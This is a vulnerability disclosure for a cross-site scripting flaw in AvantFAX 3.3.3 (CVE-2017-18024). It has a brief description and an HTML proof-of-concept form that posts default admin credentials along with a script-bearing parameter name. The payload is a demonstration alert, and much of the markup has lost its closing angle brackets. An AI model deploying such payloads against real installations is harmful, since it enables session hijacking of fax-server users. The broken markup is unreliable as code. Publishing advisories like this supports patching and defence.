# Title: AvantFAX 3.3.3 - XSS

# Author: Nassim Asrir

# Contact: wassline@gmail.com

# Vendor: https://www.officetracker.com/

# CVE: CVE-2017-18024

# Description

 AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI,
 as demonstrated by a parameter whose name contains a
 SCRIPT element and whose value is 1.

 ------------------------------------------

 # Details
 
 The name of an arbitrarily supplied body parameter is copied into the
 HTML document as plain text between tags. The payload
 jlbqg<scriptalert(1)</scriptb7g0x was submitted in the name of an
 arbitrarily supplied body parameter. This input was echoed

 ------------------------------------------

 #Attack Type
 
 Remote

 ------------------------------------------


# POC

 <html>
   
   <body
   <scripthistory.pushState('', '', '/')</script
     <form action="http://server/" method="POST"
       <input type="hidden" name="username" value="admin" /
       <input type="hidden" name="password" value="admin" /
       <input type="hidden" name="&#95;submit&#95;check" value="1" /
       <input type="hidden" name="jlbqg&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;b7g0x" value="1" /
       <input type="submit" value="Submit request" /
     </form
   </body
 </html